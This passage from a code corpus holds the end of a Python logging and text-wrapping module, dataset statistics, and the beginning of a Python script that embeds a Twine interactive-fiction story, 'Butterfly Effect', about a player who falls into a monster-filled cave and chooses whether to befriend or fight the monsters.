msg_data_prefix='#RED#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def x(p1='', **kwrgs):
print('p1 =',p1)
p2 = kwrgs.get('p2')
print('p2 =', p2)
p3 = kwrgs.get('p3')
print('p3 =', p3)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = '{}'.format(module_ProgramName)
module_version = 0.1
module_identityDictionary = {
'module_ProgramName':module_ProgramName,
'module_id':module_id,
'module_version':module_version,
'module_is_externally_configurable':False,
}
module_configuration = {}
module_configuration = retrieve_module_configuration(__file__, module_identityDictionary, module_configuration, print_enabled=thisApp.DEBUG_ON, filelog_enabled=thisApp.FILELOG_ON, handle_as_init=False)
msg = f'module [{module_id}] [[version {module_version}]] loaded.'
# if thisApp.get_module_debug_level(module_id):
# print_message(msg)
# msg = f'module [{module_id}] [[version {module_version}]] loaded.'
if thisApp.get_module_debug_level(module_id):
print(colorized_string(msg))
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#x('xxxx',p2='222222',p4='4444444')
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# main
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if __name__ == '__main__':
print(__file__)
msgText="""This function wraps the #C0# input paragraph #C0#such that each line in th#C0#e paragraph is at most width characters long. The wrap method returns a list of output lines. The returned list is empty if the wrapped output has no content. """
print(msgText)
print('')
x = bobbi_starr(msgText, initial_indent="", subsequent_indent="", break_long_words=True, width=0)
print(x)
| 40.738767
| 255
| 0.482392
| 4,257
| 38,987
| 4.149871
| 0.056378
| 0.066738
| 0.036794
| 0.02502
| 0.802785
| 0.772897
| 0.759368
| 0.752859
| 0.749575
| 0.738651
| 0
| 0.012929
| 0.244133
| 38,987
| 957
| 256
| 40.738767
| 0.586549
| 0.196117
| 0
| 0.717877
| 0
| 0.015363
| 0.15175
| 0.035416
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027933
| false
| 0.01257
| 0.01257
| 0
| 0.107542
| 0.050279
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a613d21a0dd4eb4981aa435cb768ba20a271fc6
| 84,367
|
py
|
Python
|
main.py
|
mmhamman/Project1
|
b04910fda5a346c9d568798c2c578071d75443f7
|
[
"MIT"
] | null | null | null |
main.py
|
mmhamman/Project1
|
b04910fda5a346c9d568798c2c578071d75443f7
|
[
"MIT"
] | null | null | null |
main.py
|
mmhamman/Project1
|
b04910fda5a346c9d568798c2c578071d75443f7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
assert sys.version_info >= (3,9), "This script requires at least Python 3.9"
world = {
"uuid": "CDC045DF-724E-4E86-A2D1-A374D5E5636A",
"name": "Butterfly Effect",
"creator": "Twine",
"creatorVersion": "2.3.14",
"schemaName": "Harlowe 3 to JSON",
"schemaVersion": "0.0.6",
"createdAtMs": 1631503631401,
"passages": [
{
"name": "Bedroom",
"tags": "",
"id": "1",
"text": "You wake up exhausted from the night before. \n-Too many videogames- \nYou think to yourself but it's ok because it's a Sunday and you have all day ahead of you.\n\n[[NEXT->Bedroom2]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Bedroom2",
"original": "[[NEXT->Bedroom2]]"
}
],
"hooks": [],
"cleanText": "You wake up exhausted from the night before. \n-Too many videogames- \nYou think to yourself but it's ok because it's a Sunday and you have all day ahead of you."
},
{
"name": "Bedroom2",
"tags": "",
"id": "2",
"text": "You look over at your clock.\n-12:00????-\nYou remember you and your friend Mark were going to the cave to hang out. That would be pretty fun or you could blow him off to play more Life is Weird. It's this cool game you got for your FunStation 4 about your choices and how they affect the story and based on your choices the game will have different outcomes. What was I talking about? Oh yea, what do you wanna do?\n\n[[PLAY->Bedroom3]]\n[[FRIEND->CaveEntrance]]",
"links": [
{
"linkText": "PLAY",
"passageName": "Bedroom3",
"original": "[[PLAY->Bedroom3]]"
},
{
"linkText": "FRIEND",
"passageName": "CaveEntrance",
"original": "[[FRIEND->CaveEntrance]]"
}
],
"hooks": [],
"cleanText": "You look over at your clock.\n-12:00????-\nYou remember you and your friend Mark were going to the cave to hang out. That would be pretty fun or you could blow him off to play more Life is Weird. It's this cool game you got for your FunStation 4 about your choices and how they affect the story and based on your choices the game will have different outcomes. What was I talking about? Oh yea, what do you wanna do?"
},
{
"name": "Bedroom3",
"tags": "",
"id": "3",
"score": -10,
"text": "Wow you are really lazy I can't believe you picked this option! Don't leave your friend waiting!\n\n[[NEXT->CaveEntrance]]",
"links": [
{
"linkText": "NEXT",
"passageName": "CaveEntrance",
"original": "[[NEXT->CaveEntrance]]"
}
],
"hooks": [],
"cleanText": "Wow you are really lazy I can't believe you picked this option! Don't leave your friend waiting!"
},
{
"name": "CaveEntrance",
"tags": "",
"id": "4",
"text": "After a bit of a walk, just enough to realize you never had breakfast, you make it to the cave entrance. You see your friend waving. He is slightly taller than you with silver eyes and dark hair.\nFriend: Hey sleepyhead! About time you rolled around! I was getting worried something bad had happened.\nYou: Like what?\nFriend: I don't know maybe your mom did something about your videogame addiction. Were you up late again?\nYou: Guilty.\nYour friend shrugs his shoulders and then motions to the cave entrance. \nFriend: Ready to tackle the cave? My dad always said something was special about this place. Almost as if the cave chose us to be here today rather than ourselves.\nYou: Ugh you're weirding me out come one let's get this over with.\n\n[[ENTER->Cave]]",
"links": [
{
"linkText": "ENTER",
"passageName": "Cave",
"original": "[[ENTER->Cave]]"
}
],
"hooks": [],
"cleanText": "After a bit of a walk, just enough to realize you never had breakfast, you make it to the cave entrance. You see your friend waving. He is slightly taller than you with silver eyes and dark hair.\nFriend: Hey sleepyhead! About time you rolled around! I was getting worried something bad had happened.\nYou: Like what?\nFriend: I don't know maybe your mom did something about your videogame addiction. Were you up late again?\nYou: Guilty.\nYour friend shrugs his shoulders and then motions to the cave entrance. \nFriend: Ready to tackle the cave? My dad always said something was special about this place. Almost as if the cave chose us to be here today rather than ourselves.\nYou: Ugh you're weirding me out come one let's get this over with."
},
{
"name": "Cave",
"tags": "",
"id": "5",
"text": "You walk into the cave with your friend behind you. The cave is dark and moist. The only light is from the entrance. After hearing your friend's shaky breathing you quickly realize he was hoping you wouldn't have came so he didn't have to go in. After surveying the area you see a faint glimmer in a corner and deeper into the cave their is a ledge.\n\n[[GLIMMER->Glimmer]]\n[[LEDGE->Ledge]]",
"links": [
{
"linkText": "GLIMMER",
"passageName": "Glimmer",
"original": "[[GLIMMER->Glimmer]]"
},
{
"linkText": "LEDGE",
"passageName": "Ledge",
"original": "[[LEDGE->Ledge]]"
}
],
"hooks": [],
"cleanText": "You walk into the cave with your friend behind you. The cave is dark and moist. The only light is from the entrance. After hearing your friend's shaky breathing you quickly realize he was hoping you wouldn't have came so he didn't have to go in. After surveying the area you see a faint glimmer in a corner and deeper into the cave their is a ledge."
},
{
"name": "Glimmer",
"tags": "",
"id": "6",
"text": "You inch closer to the glimmer and see a bottle! It has a note inside do you want to read it?\n\n[[READ->Note]]\n[[BACK->Cave1]]",
"links": [
{
"linkText": "READ",
"passageName": "Note",
"original": "[[READ->Note]]"
},
{
"linkText": "BACK",
"passageName": "Cave1",
"original": "[[BACK->Cave1]]"
}
],
"hooks": [],
"cleanText": "You inch closer to the glimmer and see a bottle! It has a note inside do you want to read it?"
},
{
"name": "Ledge",
"tags": "",
"id": "7",
"text": "You walk towards the ledge and notice there's a giant hole. You try to look deeper inside but see nothing, it's too dark. Maybe if you just got a little closer.... [This will end exploration of this area]\n\n[[BACK->Cave1]]\n[[APPROACH->EndOFLedge]]",
"links": [
{
"linkText": "BACK",
"passageName": "Cave1",
"original": "[[BACK->Cave1]]"
},
{
"linkText": "APPROACH",
"passageName": "EndOFLedge",
"original": "[[APPROACH->EndOFLedge]]"
}
],
"hooks": [],
"cleanText": "You walk towards the ledge and notice there's a giant hole. You try to look deeper inside but see nothing, it's too dark. Maybe if you just got a little closer.... [This will end exploration of this area]"
},
{
"name": "Note",
"tags": "",
"id": "8",
"text": "You unfurl the note from inside the bottle after taking it out.\nTo all who read this note: DO NOT GO ANY FURTHER. There is something weird about this cave. From the ledge I could hear talking from deep inside the cave and deep in the hole I could make out silhouettes of inhuman figures, some would call them monsters.\nFriend: OOOo spooky! Are you creeped out? Because I'm not. No sir, not me at all.\n\n[[BACK->Glimmer]]",
"links": [
{
"linkText": "BACK",
"passageName": "Glimmer",
"original": "[[BACK->Glimmer]]"
}
],
"hooks": [],
"cleanText": "You unfurl the note from inside the bottle after taking it out.\nTo all who read this note: DO NOT GO ANY FURTHER. There is something weird about this cave. From the ledge I could hear talking from deep inside the cave and deep in the hole I could make out silhouettes of inhuman figures, some would call them monsters.\nFriend: OOOo spooky! Are you creeped out? Because I'm not. No sir, not me at all."
},
{
"name": "Cave1",
"tags": "",
"id": "9",
"text": "Friend: You're not leaving yet are you? You are staying here and if you want to leave let me go first please. I gotta.... make sure it's safe.\n\n[[GLIMMER->Glimmer]]\n[[LEDGE->Ledge]]",
"links": [
{
"linkText": "GLIMMER",
"passageName": "Glimmer",
"original": "[[GLIMMER->Glimmer]]"
},
{
"linkText": "LEDGE",
"passageName": "Ledge",
"original": "[[LEDGE->Ledge]]"
}
],
"hooks": [],
"cleanText": "Friend: You're not leaving yet are you? You are staying here and if you want to leave let me go first please. I gotta.... make sure it's safe."
},
{
"name": "EndOFLedge",
"tags": "",
"id": "10",
"text": "You peer over the ledge and look deeper and deeper into the hole. You notice two little jewel like glimmers shine and then-\nHUH?? They moved! \nFriend: Did you see that??\nUnknown: Want a closer look?\nAs soon as you hear that somewhat familiar but unidentifiable voice you also hear your friend let out a giant scream. He was pushed off the ledge.\nUnknown: H-hey! What are you doing here?\nYou also get pushed off by the mysterious figure.\n\n[[NEXT->BottomOfHole]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole",
"original": "[[NEXT->BottomOfHole]]"
}
],
"hooks": [],
"cleanText": "You peer over the ledge and look deeper and deeper into the hole. You notice two little jewel like glimmers shine and then-\nHUH?? They moved! \nFriend: Did you see that??\nUnknown: Want a closer look?\nAs soon as you hear that somewhat familiar but unidentifiable voice you also hear your friend let out a giant scream. He was pushed off the ledge.\nUnknown: H-hey! What are you doing here?\nYou also get pushed off by the mysterious figure."
},
{
"name": "BottomOfHole",
"tags": "",
"id": "11",
"text": "???: Hey bud are you ok?\nYou slowly get up. You look beneath your feet and see a patch of flowers blocked your fall. upon examining your surroundings you see a dark figure.\n???: You can talk right?\nThe dark figure gets closer and you finally can identify it. It's a monster! Scaly and blue with horns! Yellow glowing eyes peer into your soul. What are you going to do?\n\n[[ATTACK->BottomOfHoleAttack]]\n[[TALK->BottomOfHoleTalk]]",
"links": [
{
"linkText": "ATTACK",
"passageName": "BottomOfHoleAttack",
"original": "[[ATTACK->BottomOfHoleAttack]]"
},
{
"linkText": "TALK",
"passageName": "BottomOfHoleTalk",
"original": "[[TALK->BottomOfHoleTalk]]"
}
],
"hooks": [],
"cleanText": "???: Hey bud are you ok?\nYou slowly get up. You look beneath your feet and see a patch of flowers blocked your fall. upon examining your surroundings you see a dark figure.\n???: You can talk right?\nThe dark figure gets closer and you finally can identify it. It's a monster! Scaly and blue with horns! Yellow glowing eyes peer into your soul. What are you going to do?"
},
{
"name": "BottomOfHoleAttack",
"tags": "",
"id": "12",
"text": "You throw a swift punch and knock the monster to the ground.\n???: Nice t-to m-meet you too pal.\nThe monster slowly gets up using it's long sharp claws.\n???: I just want to talk.\nYou think about it for a second and decide it would be too socially awkward to run away because he's such a nice guy.\nWilbur: I'm Wilber. I've already met your sidehook but I want to know more about you like your name.\nYou tell Wilbur your name and he steps back and thinks for a second.\nWilbur: I'll call you Slippy after my brother's favorite videogame character and that sick barrel roll you did off the ledge up there!\n\n[[NEXT->BottomOfHole1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole1",
"original": "[[NEXT->BottomOfHole1]]"
}
],
"hooks": [],
"cleanText": "You throw a swift punch and knock the monster to the ground.\n???: Nice t-to m-meet you too pal.\nThe monster slowly gets up using it's long sharp claws.\n???: I just want to talk.\nYou think about it for a second and decide it would be too socially awkward to run away because he's such a nice guy.\nWilbur: I'm Wilber. I've already met your sidehook but I want to know more about you like your name.\nYou tell Wilbur your name and he steps back and thinks for a second.\nWilbur: I'll call you Slippy after my brother's favorite videogame character and that sick barrel roll you did off the ledge up there!"
},
{
"name": "BottomOfHoleTalk",
"tags": "",
"id": "13",
"text": "You: H-hi\n???: Do you have a lot of friends in school? You don't seem very extroverted.\nYou: I fell off the ledge.\n???: I'm near sighted, but I'm not blind you fell right in front of me. Where are my manners??\nYou: I don't know did you check your pockets?\nHe gives you a weird look because your pun wasn't funny and you kinda regret not punching him.\nWilbur: My name's Wilbur. We'll work on whatever that was. Anyways, how does the name Slippy sound? I got my inspiration from that sick barrel roll you did down the slope.\n\n[[NEXT->BottomOfHole1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole1",
"original": "[[NEXT->BottomOfHole1]]"
}
],
"hooks": [],
"cleanText": "You: H-hi\n???: Do you have a lot of friends in school? You don't seem very extroverted.\nYou: I fell off the ledge.\n???: I'm near sighted, but I'm not blind you fell right in front of me. Where are my manners??\nYou: I don't know did you check your pockets?\nHe gives you a weird look because your pun wasn't funny and you kinda regret not punching him.\nWilbur: My name's Wilbur. We'll work on whatever that was. Anyways, how does the name Slippy sound? I got my inspiration from that sick barrel roll you did down the slope."
},
{
"name": "BottomOfHole1",
"tags": "",
"id": "14",
"text": "-Slippy-\nYou slowly collect your thoughts and you remember everything.\nYou: Wait! Did anyone else fall down here?\nWilbur: Nope, just you Slippy\nYou: I was with a friend of mine and we fell down the hole. I guess we fell down different passages.\nWilbur: I should've known you came from above ground since you are a human. We look so different.\nYou examine his scaly body noting his tail and claws and horns and glowing yellow eyes. They remind you of what you saw when you peered into the hole. \nWilbur: I'm afraid there's only one way back up. Through the demon king's castle.\nYou: D-demon king??\nWilbur: Oh he's a total softy. He doesn't take too kindly to humans though so I guess your fear is justified.\n\n[[NEXT->BottomOfHole2]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole2",
"original": "[[NEXT->BottomOfHole2]]"
}
],
"hooks": [],
"cleanText": "-Slippy-\nYou slowly collect your thoughts and you remember everything.\nYou: Wait! Did anyone else fall down here?\nWilbur: Nope, just you Slippy\nYou: I was with a friend of mine and we fell down the hole. I guess we fell down different passages.\nWilbur: I should've known you came from above ground since you are a human. We look so different.\nYou examine his scaly body noting his tail and claws and horns and glowing yellow eyes. They remind you of what you saw when you peered into the hole. \nWilbur: I'm afraid there's only one way back up. Through the demon king's castle.\nYou: D-demon king??\nWilbur: Oh he's a total softy. He doesn't take too kindly to humans though so I guess your fear is justified."
},
{
"name": "BottomOfHole2",
"tags": "",
"id": "15",
"text": "Wilbur: I can tell this is a lot to process but I'll help you out I made a promise to an old friend that I would help little guys like you. I'll teach you how to survive out here. \nYou breath a sigh of relief. All you need now is to find your friend and Wilbur will help you guys out.\nWilbur: My first bit of advice is this. Even though I'm a nice guy, others don't share my views. Whether you CHOOSE to fight off these types of monsters or befriend them is up to you, just remember, your choices have consequences. Now come on don't be shy I'm your official tour guide to the realm of monsters!\n\n[[NEXT->MushroomForest]]",
"links": [
{
"linkText": "NEXT",
"passageName": "MushroomForest",
"original": "[[NEXT->MushroomForest]]"
}
],
"hooks": [],
"cleanText": "Wilbur: I can tell this is a lot to process but I'll help you out I made a promise to an old friend that I would help little guys like you. I'll teach you how to survive out here. \nYou breath a sigh of relief. All you need now is to find your friend and Wilbur will help you guys out.\nWilbur: My first bit of advice is this. Even though I'm a nice guy, others don't share my views. Whether you CHOOSE to fight off these types of monsters or befriend them is up to you, just remember, your choices have consequences. Now come on don't be shy I'm your official tour guide to the realm of monsters!"
},
{
"name": "MushroomForest",
"tags": "",
"id": "16",
"text": "You follow Wilbur though some tight fitting caves and pop out of a huge expanse. It's a forrest but instead of trees it's... mushrooms? I guess it is still a cave after all but taking a deep breath in it feels like fresh air.\nWilbur: This is Mushroom Forrest! If you wanna see my house we can go down that path or if you hate sidequests and fun, we can go straight ahead.\n\n[[PATH->House]]\n[[STRAIGHT->MushroomForestExit]]",
"links": [
{
"linkText": "PATH",
"passageName": "House",
"original": "[[PATH->House]]"
},
{
"linkText": "STRAIGHT",
"passageName": "MushroomForestExit",
"original": "[[STRAIGHT->MushroomForestExit]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur though some tight fitting caves and pop out of a huge expanse. It's a forrest but instead of trees it's... mushrooms? I guess it is still a cave after all but taking a deep breath in it feels like fresh air.\nWilbur: This is Mushroom Forrest! If you wanna see my house we can go down that path or if you hate sidequests and fun, we can go straight ahead."
},
{
"name": "House",
"tags": "",
"id": "17",
"text": "You walk down the path and approach a log-uh I mean mushroom..? cabin. Wilbur skips up to the door and knocks comically loud and fast. You hear a mysterious unknown voice scream at the top of it's lungs.\nWilbur: Uh oh gotta go.\nHe quickly opens the door which apparently was unlocked and he runs inside. You can't chase him fast enough and end up alone in his living room.\n\n[[NEXT->HouseLiving]]",
"links": [
{
"linkText": "NEXT",
"passageName": "HouseLiving",
"original": "[[NEXT->HouseLiving]]"
}
],
"hooks": [],
"cleanText": "You walk down the path and approach a log-uh I mean mushroom..? cabin. Wilbur skips up to the door and knocks comically loud and fast. You hear a mysterious unknown voice scream at the top of it's lungs.\nWilbur: Uh oh gotta go.\nHe quickly opens the door which apparently was unlocked and he runs inside. You can't chase him fast enough and end up alone in his living room."
},
{
"name": "HouseLiving",
"tags": "",
"id": "18",
"text": "You see a kitchen/dining room to your front and on the side there are 2 doors. One is slightly ajar to the right and the other to the left has a bunch of signs that say no entry and a-what is that?-banana..? nailed to the door. \n\n[[KITCHEN->Kitchen]]\n[[RIGHT->OrvilleRoom]]\n[[LEFT->Knock]]",
"links": [
{
"linkText": "KITCHEN",
"passageName": "Kitchen",
"original": "[[KITCHEN->Kitchen]]"
},
{
"linkText": "RIGHT",
"passageName": "OrvilleRoom",
"original": "[[RIGHT->OrvilleRoom]]"
},
{
"linkText": "LEFT",
"passageName": "Knock",
"original": "[[LEFT->Knock]]"
}
],
"hooks": [],
"cleanText": "You see a kitchen/dining room to your front and on the side there are 2 doors. One is slightly ajar to the right and the other to the left has a bunch of signs that say no entry and a-what is that?-banana..? nailed to the door."
},
{
"name": "Kitchen",
"tags": "",
"id": "19",
"text": "You walk into the kitchen/dining room area and immediately spot a bunch of bananas on the counter and table. Only heaven knows what's in the fridge, probably more bananas. Maybe check out what's in that room with the open door?\n\n[[BACK->HouseLiving]]",
"links": [
{
"linkText": "BACK",
"passageName": "HouseLiving",
"original": "[[BACK->HouseLiving]]"
}
],
"hooks": [],
"cleanText": "You walk into the kitchen/dining room area and immediately spot a bunch of bananas on the counter and table. Only heaven knows what's in the fridge, probably more bananas. Maybe check out what's in that room with the open door?"
},
{
"name": "OrvilleRoom",
"tags": "",
"id": "20",
"text": "You slowly appraoch the open door and see a shadowy figure inside. You walk into the room and before you can introduce yourself, the shadowy figure lunges at you.\n???: I'll kill you!\nYou let out a scream and before you can have your life flash before your eyes the figure stops.\n???: Ew. What are you cosplaying as, a human?\nYou: Uh, I am a human?\nThe figure stares at you in horror. While he is in shock you examine him and realize he looks very similar to Wilbur taller and red. This must be his brother.\nWilbur: Hey Orville, this is my new friend.\nOrville: YOU BROUGHT A HUMAN HOME?\nWibur: Well technically he chose to come here of his own volition so I followed him while walking in front of him.\n\n[[NEXT->OrvilleRoom1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "OrvilleRoom1",
"original": "[[NEXT->OrvilleRoom1]]"
}
],
"hooks": [],
"cleanText": "You slowly appraoch the open door and see a shadowy figure inside. You walk into the room and before you can introduce yourself, the shadowy figure lunges at you.\n???: I'll kill you!\nYou let out a scream and before you can have your life flash before your eyes the figure stops.\n???: Ew. What are you cosplaying as, a human?\nYou: Uh, I am a human?\nThe figure stares at you in horror. While he is in shock you examine him and realize he looks very similar to Wilbur taller and red. This must be his brother.\nWilbur: Hey Orville, this is my new friend.\nOrville: YOU BROUGHT A HUMAN HOME?\nWibur: Well technically he chose to come here of his own volition so I followed him while walking in front of him."
},
{
"name": "Knock",
"tags": "",
"id": "21",
"text": "You knock on the door carefully avoiding the banana and you hear a lot of fumbling around but inevitably no one answers. You roll your eyes as you realize this is Wilbur's room and he's probably cleaning it because he didn't expect you to try this sidequest.\n\n[[BACK->HouseLiving]]",
"links": [
{
"linkText": "BACK",
"passageName": "HouseLiving",
"original": "[[BACK->HouseLiving]]"
}
],
"hooks": [],
"cleanText": "You knock on the door carefully avoiding the banana and you hear a lot of fumbling around but inevitably no one answers. You roll your eyes as you realize this is Wilbur's room and he's probably cleaning it because he didn't expect you to try this sidequest."
},
{
"name": "OrvilleRoom1",
"tags": "",
"id": "22",
"text": "Orville: I'm going to throw up. The demon king is going to kill us.\nWilbur: Nah he's a big softy. Well except to humans so I guess your fear is justified.\nYou roll your eyes as you figure out just exactly what it means to be a human in a monster's world.\nOrville: What do you even plan to do with him? He sticks out like a sore thumb.\nWilbur: I was looking for my banana costume but SOMEONE took it.\nYou: How many bananas do you have?\nWilbur: There was a sale at the banana store, I couldn't resist.\nOrville: Did you check in your closet?\nWilbur: No? That's where I keep all my banana-related clothing, why would it be in there.\nYou let out a light chuckle and when Wilbur gives you another weird look like before and you realize he was being serious.\nWilbur: Also I'm taking him to the demon king to let him back to human world.\nOrville grows pale. \nOrville: No, I'm gonna report him. We can't risk this again you are lucky you came away with your head when you-know-what happened.\nWilbur: Plllllllleeeeeaaaasssseee. I'll give you a banana if you don't.\nYou look around as Orville reaches for his phone. You spot a sword and realize this is your moment. You can attack him or try to convince him to not report you. What will you do?\n\n[[TALK->OrvilleRoomTalk]]\n[[ATTACK->OrvilleRoomAttack]]",
"links": [
{
"linkText": "TALK",
"passageName": "OrvilleRoomTalk",
"original": "[[TALK->OrvilleRoomTalk]]"
},
{
"linkText": "ATTACK",
"passageName": "OrvilleRoomAttack",
"original": "[[ATTACK->OrvilleRoomAttack]]"
}
],
"hooks": [],
"cleanText": "Orville: I'm going to throw up. The demon king is going to kill us.\nWilbur: Nah he's a big softy. Well except to humans so I guess your fear is justified.\nYou roll your eyes as you figure out just exactly what it means to be a human in a monster's world.\nOrville: What do you even plan to do with him? He sticks out like a sore thumb.\nWilbur: I was looking for my banana costume but SOMEONE took it.\nYou: How many bananas do you have?\nWilbur: There was a sale at the banana store, I couldn't resist.\nOrville: Did you check in your closet?\nWilbur: No? That's where I keep all my banana-related clothing, why would it be in there.\nYou let out a light chuckle and when Wilbur gives you another weird look like before and you realize he was being serious.\nWilbur: Also I'm taking him to the demon king to let him back to human world.\nOrville grows pale. \nOrville: No, I'm gonna report him. We can't risk this again you are lucky you came away with your head when you-know-what happened.\nWilbur: Plllllllleeeeeaaaasssseee. I'll give you a banana if you don't.\nYou look around as Orville reaches for his phone. You spot a sword and realize this is your moment. You can attack him or try to convince him to not report you. What will you do?"
},
{
"name": "OrvilleRoomTalk",
"tags": "",
"id": "23",
"score": 10,
"text": "You: Please don't report me!\nOrville pasuses. \nOrville: Why?\nYou: I uh, didn't think I'd get this far.\nEveryone is confused as you let out an embarrassing chuckle.\nWilbur: I made a promise to help Slippy so I will.\nOrville: You named it??\nOrville sighs and sits next to a pile of swords.\nWilbur: Come one bro, all you have to do is sit here and keep practicing for the royal guard. My actions don't effect you we're monsters, not humans.\nYou feel slightly insulted now but relieved as talking seems to have worked.\nWilbur: Come on slippy, let's get you home.\nOrville: You better come home tonight!\nAs Wilbur motions you to leave he hugs Orville and whispers something to him. I think it's time to leave.\n\n[[BACK->HouseLeave]]",
"links": [
{
"linkText": "BACK",
"passageName": "HouseLeave",
"original": "[[BACK->HouseLeave]]"
}
],
"hooks": [],
"cleanText": "You: Please don't report me!\nOrville pasuses. \nOrville: Why?\nYou: I uh, didn't think I'd get this far.\nEveryone is confused as you let out an embarrassing chuckle.\nWilbur: I made a promise to help Slippy so I will.\nOrville: You named it??\nOrville sighs and sits next to a pile of swords.\nWilbur: Come one bro, all you have to do is sit here and keep practicing for the royal guard. My actions don't effect you we're monsters, not humans.\nYou feel slightly insulted now but relieved as talking seems to have worked.\nWilbur: Come on slippy, let's get you home.\nOrville: You better come home tonight!\nAs Wilbur motions you to leave he hugs Orville and whispers something to him. I think it's time to leave."
},
{
"name": "OrvilleRoomAttack",
"tags": "",
"id": "24",
"score": -10,
"text": "You grab the sword and lunge at Orville as he did you. This time, however, you didn't stop. As you swing Orville vanishes out of thin air. Is this how monsters die?\nWilbur: Why did you do that?\nYou: I had to! He was gonna report me!\nWilbur sighs and motions you to follow him.\nWilbur: Come on Slippy, we need to go.\nIt's almost frustrating how little he cares about his own brother to just walk away like that.\nWilbur: Must one of those kinda runs.\n\n[[FOLLOW->MushroomForestExitEvil]]",
"links": [
{
"linkText": "FOLLOW",
"passageName": "MushroomForestExitEvil",
"original": "[[FOLLOW->MushroomForestExitEvil]]"
}
],
"hooks": [],
"cleanText": "You grab the sword and lunge at Orville as he did you. This time, however, you didn't stop. As you swing Orville vanishes out of thin air. Is this how monsters die?\nWilbur: Why did you do that?\nYou: I had to! He was gonna report me!\nWilbur sighs and motions you to follow him.\nWilbur: Come on Slippy, we need to go.\nIt's almost frustrating how little he cares about his own brother to just walk away like that.\nWilbur: Must one of those kinda runs."
},
{
"name": "MushroomForestExitEvil",
"tags": "",
"id": "25",
"text": "You and Wilbur share a quiet tense walk over to the next destination. You look ahead and notice a gate.\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge.\nYou think for a moment as you desperately want to show him humans aren't all like that but you are more of a monster than him.\nWilbur: I guess I understand why now.\nYou: You don't have to help me.\nWilbur gets frustrated.\nWilbur: Yes I do, I made a promise.\n\n[[NEXT->CastleGatesEvil]]",
"links": [
{
"linkText": "NEXT",
"passageName": "CastleGatesEvil",
"original": "[[NEXT->CastleGatesEvil]]"
}
],
"hooks": [],
"cleanText": "You and Wilbur share a quiet tense walk over to the next destination. You look ahead and notice a gate.\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge.\nYou think for a moment as you desperately want to show him humans aren't all like that but you are more of a monster than him.\nWilbur: I guess I understand why now.\nYou: You don't have to help me.\nWilbur gets frustrated.\nWilbur: Yes I do, I made a promise."
},
{
"name": "HouseLeave",
"tags": "",
"id": "26",
"text": "You follow Wilbur out of the house and wave bye to Orville who is smiling and waving back. I think you made a friend.\nWilbur: How was that little sidequest? Fun right? Let's go back on the path to the castle.\n\n[[NEXT->MushroomForestExit]]",
"links": [
{
"linkText": "NEXT",
"passageName": "MushroomForestExit",
"original": "[[NEXT->MushroomForestExit]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur out of the house and wave bye to Orville who is smiling and waving back. I think you made a friend.\nWilbur: How was that little sidequest? Fun right? Let's go back on the path to the castle."
},
{
"name": "MushroomForestExit",
"tags": "",
"id": "27",
"text": "You go straight through the forest and after a bit of walking you see large gates.\nWilbur: These are the castle gates. There's a town and then inside the castle there is a staircase that leads straight to the human world.\nYou: Maybe I can show you my world and my house!\nWilbur: Heh I wish. Everyone knows monsters were banished to this underground world. \nYou: What?\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge. You don't seem so bad though.\nYou: That's crazy I never knew any of that?\nWilbur: That surprising. Maybe that's why Harry got out so easily.\nYou: Harry?\nWilbur: Oh yea he was this real tall monkey looking like creature, he had huge feet.\nYou: Bigfoot?\nWilbur: hehe that's what we called him in gradeschool how did you know?\nYou: Just uh guessing...\n\n[[NEXT->CastleGates]]",
"links": [
{
"linkText": "NEXT",
"passageName": "CastleGates",
"original": "[[NEXT->CastleGates]]"
}
],
"hooks": [],
